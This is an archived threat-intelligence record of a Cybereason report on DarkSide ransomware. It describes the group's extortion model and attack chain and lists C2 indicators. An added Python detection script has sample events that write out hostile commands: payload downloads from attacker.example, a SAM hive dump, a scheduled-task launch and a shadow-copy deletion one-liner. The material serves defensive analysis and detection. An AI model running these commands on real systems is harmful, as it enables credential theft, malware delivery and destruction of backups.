{
	"id": "7ff5a67a-7314-4434-8b08-18347fe26c9a",
	"created_at": "2026-04-06T00:10:39.938236Z",
	"updated_at": "2026-04-10T03:21:44.570373Z",
	"deleted_at": null,
	"sha1_hash": "49060b98200c99861c3e9714f20afc6ce4aca1ea",
	"title": "Cybereason vs. DarkSide Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1255430,
	"plain_text": "Cybereason vs. DarkSide Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 15:46:01 UTC\r\nDarkSide is a relatively new ransomware strain that made its first appearance in August 2020. DarkSide follows the RaaS (ransomware-as-a-service) model, and, according to Hack Forums, the DarkSide team recently announced the release of DarkSide 2.0. According to the group, it is equipped with the fastest encryption speed on the market, and even includes Windows and Linux versions.\r\nThe team is very active on hack forums and keeps its customers updated with news related to the ransomware. In an effort to grow and expand their operations, the group has started an affiliate program for potential users.\r\nLike many other ransomware variants, DarkSide follows the double extortion trend: the threat actors not only encrypt the victim’s data, but first exfiltrate it and threaten to publish it if the ransom is not paid. This is what makes backups, on their own, an incomplete defense: they restore availability, but do nothing against the threat of publication.\r\nDarkSide is observed being used against targets in English-speaking countries, and appears to avoid targets in countries associated with former Soviet Bloc nations. 
The ransom demand ranges from US$200,000 to $2,000,000, and according to their website, the group has published stolen data from more than 40 victims, which is estimated to be just a fraction of the overall number of victims:\r\nDarkSide Leaks website\r\nUnlike many ransomware variants such as Maze, which was employed to successfully attack suburban Washington schools, the group behind DarkSide appears to have a code of conduct that prohibits attacks against hospitals, hospices, schools, universities, non-profit organizations, and government agencies:\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 1 of 13\r\nOne of the rules of the affiliate program - prohibited sectors to attack\r\nKey details\r\n• Emerging Threat: In a short amount of time, the DarkSide group has established a reputation for being a very “professional” and “organized” group that has potentially generated millions of dollars in profits from the ransomware.\r\n• High Severity: The Cybereason Nocturnus Team assesses the threat level as HIGH given the destructive potential of the attacks.\r\n• Human Operated Attack: Prior to deploying the ransomware, the attackers infiltrate the organization and move laterally through it, carrying out a fully-developed attack operation.\r\n• Aiming Towards the DC: The DarkSide group targets domain controllers (DCs), which puts the whole network environment at great risk.\r\n• Detected and Prevented: The Cybereason Defense Platform fully detects and prevents the DarkSide ransomware.\r\nCybereason Blocks DarkSide Ransomware\r\nThe DarkSide group is a relatively new player in the game of ransomware. Despite being a new group, though, the DarkSide team has already built itself quite a reputation for making its operations more professional and organized. The group has a phone number and even a help desk to facilitate negotiations with victims, and it makes a great effort at collecting information about its victims - not just technical information about their environment, but more general information about the company itself, like the organization’s size and estimated revenue.\r\nBy collecting information about the victims, the group is making sure the ransomware is only used against the “right targets.” The group claims it only targets large, profitable companies, and claims to have extorted millions of dollars from companies in an effort to \"make the world a better place.\" The group even wrote in a forum that \"some of the money the companies have paid will go to charity… No matter how bad you think our work is, we are pleased to know that we helped change someone's life. Today we sended (sic) the first donations.\"\r\nThe attackers posted tax receipts for their donations\r\nThe DarkSide group has reportedly tried to donate around $20,000 in stolen bitcoin to different charities, but the charities refused to accept the funds because of the source.\r\nBreaking Down the Attack\r\nDownloading the Ransomware\r\nAfter gaining an initial foothold in the network, the attackers start to collect information about the environment and the company. 
If it turns out that the potential target is on the attackers’ list of prohibited organizations (i.e. hospitals, hospices, schools, universities, non-profit organizations, or government agencies), they don’t move forward with the attack.\r\nIf not on the prohibited list, the attackers continue to carry out the operation:\r\n• The attackers begin to collect files, credentials and other sensitive information, and exfiltrate it.\r\n• The attackers use PowerShell to download the DarkSide binary as “update.exe” using the .NET WebClient “DownloadFile” method, abusing Certutil.exe and Bitsadmin.exe in the process:\r\nDownloading the DarkSide ransomware binary using the DownloadFile command\r\nDownloading the DarkSide ransomware binary using Certutil.exe\r\nIn addition to downloading the DarkSide binary into the C:\\Windows and temporary directories, the attacker also creates a shared folder on the infected machine and uses PowerShell to download a copy of the malware there.\r\nConquering the Domain Controller\r\nAfter successfully gaining a foothold on one machine in the environment, the attacker begins to move laterally, with the main goal of conquering the Domain Controller (DC).\r\nOnce the attackers make it to the DC, they start to collect other sensitive information and files, including dumping the SAM hive, which stores the password hashes of the machine’s local accounts (domain account hashes live in the NTDS.dit database, not in the SAM):\r\nUsing reg.exe to steal credentials stored in the SAM hive on the DC\r\nIn addition to collecting data from the DC, the attackers use PowerShell to download the DarkSide binary from the shared folder created on the previously infected host:\r\nThe PowerShell command executed on the DC\r\nThe attackers also create a shared folder using the company’s name on the DC itself, and copy the DarkSide binary there.\r\nLater in the attack, after all data has been exfiltrated, the attackers use bitsadmin.exe to distribute the ransomware binary from the shared folder to other assets in the environment in order to maximize the damage:\r\nDownloading the DarkSide ransomware binary from a remote machine using shared folders\r\nIn order to execute the ransomware on the DC, the attackers create a scheduled task called “Test1” that is configured to run the ransomware:\r\nExecution of the DarkSide ransomware via a scheduled task\r\nThe scheduled task \\Test1, used to run the ransomware on the DC\r\nDarkSide Analysis\r\nWhen the DarkSide ransomware first executes on the infected host, it checks the language of the system using the GetSystemDefaultUILanguage() and GetUserDefaultLangID() functions, so that systems located in the former Soviet Bloc countries are not encrypted:\r\nDebugging the ransomware - checking if the installed language is Russian (419)\r\nThe malware doesn’t encrypt files on systems with any of the following languages installed (hexadecimal LANGID in parentheses):\r\nRussian (419)\r\nUkrainian (422)\r\nBelarusian (423)\r\nTajik (428)\r\nArmenian (42B)\r\nAzerbaijani (Latin) (42C)\r\nGeorgian (437)\r\nKazakh (43F)\r\nKyrgyz (Cyrillic) (440)\r\nTurkmen (442)\r\nUzbek (Latin) (443)\r\nTatar (444)\r\nRomanian (Moldova) (818)\r\nRussian (Moldova) (819)\r\nAzerbaijani (Cyrillic) (82C)\r\nUzbek (Cyrillic) (843)\r\nArabic (Syria) (2801)\r\nDarkSide then proceeds to stop the following services related to security and backup solutions:\r\nvss, sql, svc, memtas, mepocs, sophos, veeam, backup\r\nDebugging the ransomware - stopping services, and creating a connection to the hardcoded C2\r\nIt then creates a connection to its C2 (command and control) server, and in different samples analyzed, the 
attackers use the following domains and IPs:\r\n198.54.117[.]200\r\n198.54.117[.]198\r\n198.54.117[.]199\r\n198.54.117[.]197\r\ntemisleyes[.]com\r\ncatsdegree[.]com\r\nAfter uninstalling the Volume Shadow Copy Service (VSS), DarkSide deletes the existing shadow copies by launching an obfuscated PowerShell script that uses WMI to delete them:\r\nDebugging the ransomware - creating a PowerShell process\r\nThe PowerShell commands as shown in the Cybereason Defense Platform\r\nThe de-obfuscated PowerShell script:\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\r\nThe malware then enumerates the running processes and terminates selected ones to unlock the files they hold open, so that it can both steal the information stored in those files and encrypt them.\r\nDarkSide creates a unique User_ID string for the victim and appends it to the extension of the encrypted files as follows: \u003cFile_name\u003e.{userid}. In addition, the malware changes the icons of the encrypted files and changes the desktop background:\r\nBackground set by DarkSide\r\nAnd, of course, it leaves a ransom note: “README.{userid}.TXT”:\r\nDarkSide ransom note\r\nCybereason Detection and Prevention\r\nThe Cybereason Defense Platform is able to prevent the execution of the DarkSide Ransomware using multi-layer protection that detects and blocks malware with threat intelligence, machine learning, and next-gen antivirus (NGAV) capabilities. 
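Added example (not part of the Cybereason post, and not the platform's own detection logic): the tradecraft described in the Breaking Down the Attack and DarkSide Analysis sections above (the PowerShell DownloadFile, certutil and bitsadmin downloads, the reg.exe dump of the SAM hive on the DC, the Test1 scheduled task, the service stops and the WMI shadow-copy one-liner) can be turned into vendor-neutral rules over process-creation telemetry such as Sysmon Event ID 1 or Windows event 4688. The Python below runs such rules over a handful of constructed events (the hostnames, the CorpShare share name, the attacker.example download host and the command lines are invented for illustration; only the technique names and the service list come from the post), decodes PowerShell -EncodedCommand payloads before matching so that the obfuscated shadow-copy deletion is still caught, and then correlates hits per host so that a machine showing several of the techniques at once stands out from a one-off admin action.

```python
import base64
from collections import defaultdict
from dataclasses import dataclass

# Strings the post lists as the services DarkSide stops before encrypting.
DARKSIDE_STOPPED_SERVICES = ('vss', 'sql', 'svc', 'memtas', 'mepocs', 'sophos', 'veeam', 'backup')


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    image: str     # executable file name as logged (Sysmon EID 1 / Windows 4688)
    cmdline: str   # full command line as logged


def decode_encoded_command(cmdline):
    '''If powershell was launched with -EncodedCommand (base64 of UTF-16LE; also
    accepted as -enc, -ec or -e), return the decoded script, else the command line.'''
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() in ('-encodedcommand', '-enc', '-ec', '-e'):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode('utf-16le')
            except (ValueError, UnicodeDecodeError):
                return cmdline
    return cmdline


def match_rules(ev):
    '''Return the set of rule names one event matches. Each rule maps to a step the
    post describes; matching is deliberately plain substring logic on the command line.'''
    image = ev.image.lower()
    c = ' ' + decode_encoded_command(ev.cmdline).lower() + ' '
    is_ps = image in ('powershell.exe', 'pwsh.exe')
    hits = set()
    if is_ps and 'downloadfile' in c:
        hits.add('powershell_downloadfile')        # update.exe fetched via WebClient.DownloadFile
    if image == 'certutil.exe' and 'urlcache' in c and 'http' in c:
        hits.add('certutil_download')             # LOLBin download of the binary
    if image == 'bitsadmin.exe' and '/transfer' in c:
        hits.add('bitsadmin_transfer')            # initial download, or spreading from the share
    if image == 'reg.exe' and ' save ' in c and 'hklm\\sam' in c:
        hits.add('sam_hive_dump')                 # credential theft on the DC
    if image == 'schtasks.exe' and '/create' in c:
        hits.add('scheduled_task_create')         # the Test1 task that launched the payload
    if is_ps and 'win32_shadowcopy' in c and 'delete' in c:
        hits.add('shadow_copy_delete')            # the deobfuscated WMI one-liner
    if image in ('net.exe', 'net1.exe', 'sc.exe') and ' stop ' in c:
        targets = c.split(' stop ', 1)[1].split()
        if any(s in t for t in targets for s in DARKSIDE_STOPPED_SERVICES):
            hits.add('security_or_backup_service_stop')
    return hits


def triage(events, min_distinct=3):
    '''Correlate per host: several distinct techniques on one machine look like the
    hands-on-keyboard phase the post describes rather than a lone admin action.'''
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev.host] |= match_rules(ev)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_distinct}


def encode_command(script):
    '''Build a -EncodedCommand argument the way powershell.exe expects it.'''
    return base64.b64encode(script.encode('utf-16le')).decode('ascii')


SHADOW_DELETE = 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}'

# Constructed sample telemetry (hostnames, share name and download host are invented).
SAMPLE_EVENTS = [
    ProcessEvent('ws01', 'powershell.exe',
                 'powershell -c (New-Object Net.WebClient).DownloadFile(\"http://attacker.example/update.exe\",\"C:\\Windows\\Temp\\update.exe\")'),
    ProcessEvent('ws01', 'certutil.exe',
                 'certutil -urlcache -split -f http://attacker.example/update.exe C:\\Windows\\update.exe'),
    ProcessEvent('dc01', 'reg.exe', 'reg save HKLM\\SAM C:\\Windows\\Temp\\sam.hiv'),
    ProcessEvent('dc01', 'powershell.exe', 'powershell -nop -w hidden -enc ' + encode_command(SHADOW_DELETE)),
    ProcessEvent('dc01', 'schtasks.exe',
                 'schtasks /create /tn Test1 /tr C:\\Windows\\update.exe /sc once /st 00:00 /ru SYSTEM'),
    ProcessEvent('fs02', 'bitsadmin.exe',
                 'bitsadmin /transfer job1 \\\\dc01\\CorpShare\\update.exe C:\\Windows\\update.exe'),
    ProcessEvent('admin01', 'net.exe', 'net stop spooler'),   # benign: no listed service touched
]


if __name__ == '__main__':
    for ev in SAMPLE_EVENTS:
        print(ev.host, ev.image, sorted(match_rules(ev)))
    print('flagged hosts:', triage(SAMPLE_EVENTS))
```

Run it as a script to print the per-event hits and the flagged hosts. The rules deliberately look at command lines only: the ransomware itself stops services and kills processes through the Windows API rather than through net.exe, so the service-stop rule only catches operator activity, and service state changes should be watched separately (System log event 7036, or the EDR's own service telemetry). Treat the output as triage input rather than a verdict: reg.exe saving the SAM hive and schtasks /create are also legitimate administrative actions, which is why the correlation step requires several distinct techniques on the same host before it flags anything.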
Additionally, when the Anti-Ransomware feature is enabled, behavioral detection techniques in the platform are able to detect and prevent any attempt to encrypt files and generate a Malop for it:\r\nMalop for DarkSide ransomware as shown in the Cybereason Defense Platform\r\nUsing the Anti-Malware feature with the right configuration (listed in the recommendations below), the Cybereason Defense Platform will also detect and prevent the execution of the ransomware and ensure that it cannot encrypt targeted files. The prevention is based on machine learning, which blocks both known and unknown malware variants:\r\nPrevention alert of DarkSide ransomware as shown in the Cybereason Defense Platform\r\nCybereason user notification for preventing the execution of DarkSide\r\nSecurity Recommendations\r\n• Enable the Anti-Ransomware Feature on Cybereason NGAV: Set Cybereason Anti-Ransomware protection mode to Prevent - more information for customers can be found here\r\n• Enable the Anti-Malware Feature on Cybereason NGAV: Set Cybereason Anti-Malware mode to Prevent and set the detection mode to Moderate or above - more information can be found here\r\n• Keep Systems Fully Patched: Make sure your systems are patched in order to mitigate vulnerabilities\r\n• Regularly Back Up Files to a Remote Server: Restoring your files from a backup is the fastest way to regain access to your data\r\n• Use Security Solutions: Protect your environment using organizational firewalls, proxies, web filtering, and mail filtering\r\nMITRE ATT\u0026CK TECHNIQUES\r\nLateral Movement: Taint Shared Content\r\nExecution: Command and Scripting Interpreter: PowerShell\r\nPersistence: Scheduled Task/Job\r\nDefense Evasion: Deobfuscate/Decode Files or Information; Masquerading\r\nCredential Access: Credentials from Password Stores\r\nDiscovery: Account Discovery; System Information Discovery; File and Directory Discovery; Process Discovery\r\nCommand and Control: Commonly Used Port; Remote File Copy; Standard Application Layer Protocol; Ingress Tool Transfer\r\nImpact: Data Encrypted for Impact; Service Stop\r\nLior Rochberger\r\nLior is a senior threat researcher at Cybereason, focusing on threat hunting and malware research. Lior began her career as a team leader in the security operations center in the Israeli Air Force, where she mostly focused on incident response and malware analysis.\r\nAbout the Author\r\nCybereason Nocturnus\r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware"
	],
	"report_names": [
		"cybereason-vs-darkside-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434239,
	"ts_updated_at": 1775791304,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/49060b98200c99861c3e9714f20afc6ce4aca1ea.pdf",
		"text": "https://archive.orkl.eu/49060b98200c99861c3e9714f20afc6ce4aca1ea.txt",
		"img": "https://archive.orkl.eu/49060b98200c99861c3e9714f20afc6ce4aca1ea.jpg"
	}
}